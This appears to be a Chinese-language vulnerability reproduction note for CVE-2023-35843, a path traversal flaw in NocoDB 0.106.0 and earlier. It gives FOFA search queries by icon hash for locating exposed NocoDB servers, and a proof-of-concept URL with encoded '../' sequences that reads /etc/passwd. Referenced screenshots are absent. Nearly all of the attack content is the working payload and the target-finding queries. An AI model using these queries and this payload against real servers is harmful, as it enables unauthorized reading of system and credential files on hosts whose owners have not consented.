简介
NocoDB是一个开源 Airtable 替代品,可以将 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 等转换为智能电子表格。
(CVE-2023-35843) NocoDB 0.106.0版本及之前版本存在安全漏洞。攻击者利用该漏洞可以访问服务器上的任意文件。
漏洞复现
FOFA语法:
icon_hash="-2017596142"
或者
"NocoDB" && (icon_hash="-2017596142" || icon_hash="206985584")
访问后页面如下:
POC:
/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
访问:http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
不存在该漏洞或者访问失败返回如下: